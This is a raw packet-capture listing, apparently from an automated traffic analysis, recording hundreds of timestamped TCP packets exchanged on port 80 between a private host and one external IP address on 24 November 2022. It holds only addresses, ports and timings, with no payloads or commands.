Nov 24, 2022 12:20:03.312839031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312865973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312891006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312908888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312918901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312932968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312944889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312971115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313004017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313019037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313029051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313044071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313054085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313079119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313101053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313121080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313124895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313143015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313148022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313169956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313193083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313208103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313231945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313767910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313788891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313807964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313824892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313839912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313842058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313859940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.313875914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.313914061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314012051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314032078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314049959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314068079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314079046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314089060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314106941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314125061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314125061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314145088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314152956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314162016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314181089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314198017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314222097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314234018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314722061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314744949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314763069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314781904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314794064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314800978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314820051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314826012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314837933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314841032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314886093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314899921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314913988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314919949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314938068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314954042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314956903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.314971924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.314989090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315006018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315006018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315022945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315031052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315041065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315058947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315058947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315105915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315427065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315495968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.315937996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315958023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315978050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.315999031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316008091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316018105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316036940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316044092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316057920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316076994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316082954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316096067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316104889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316114902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316133976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316153049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316154003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316170931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316178083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316189051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316195965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316206932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316211939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316226006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316231966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316243887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316257000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316277981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.316632986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316668987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.316690922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.318571091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318634987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318679094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318713903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.318722010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318736076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.318764925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318806887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.318808079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318850040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318893909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.318923950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.318969965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319011927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319015980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319055080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319097996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319139957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319140911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319183111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319224119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319225073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319263935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319266081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319307089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319348097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319351912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319390059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319432020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319433928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319474936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319516897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319559097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319559097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319601059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319644928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319647074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319684029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319686890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319729090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319770098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319771051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319813967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319855928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319859028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.319897890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319941998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319983006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.319983959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320024967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320066929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320069075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320108891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320149899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320152998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320193052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320194006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320234060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320276022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320310116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320342064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320372105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320382118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320425034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320466042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320473909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320508003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320550919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320558071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320590973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320593119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320635080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320679903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320681095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320722103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320764065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320770979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320805073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320847034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320859909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.320890903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320935011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320976973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.320977926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321018934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321060896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321069956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321101904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321144104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321147919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321186066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321197033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321229935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321271896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321274996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321341038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321382999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321388006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321424961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321470022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321491003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321532965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321576118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321584940 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321619034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321660995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321702957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321707964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321746111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321788073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321793079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321827888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.321830988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321871996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321918011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321965933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.321969986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322009087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322051048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322053909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322093010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322093964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322134972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322176933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322191954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322218895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322261095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322304010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322310925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322345972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322350025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322386980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322429895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322436094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322474957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322525024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322534084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322568893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322613001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322658062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322668076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322700024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322741985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322746992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322782993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322783947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322828054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322900057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.322902918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322951078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.322992086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323031902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323034048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323076963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323117971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323124886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323160887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323204041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323208094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323245049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323246002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323288918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323332071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323333025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323374033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323429108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323431015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323472977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323517084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323563099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323568106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323606014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323647976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323653936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323690891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323734045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323740005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323775053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323776960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323818922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323862076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323867083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323904991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323950052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.323956013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.323992014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324033976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324038029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324075937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324117899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324160099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324177980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324201107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324229956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324244976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324287891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324286938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324330091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324373007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324374914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324414968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324460030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324462891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324501038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324543953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324588060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324589014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324630022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324672937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324672937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324711084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324718952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324779034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324824095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324836016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324882984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324925900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.324928045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.324970961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325012922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325014114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325056076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325099945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325103045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325141907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325185061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325227022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325227022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325269938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325311899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.325314999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.325352907 CET	49710	80	192.168.2.3	66.235.200.147
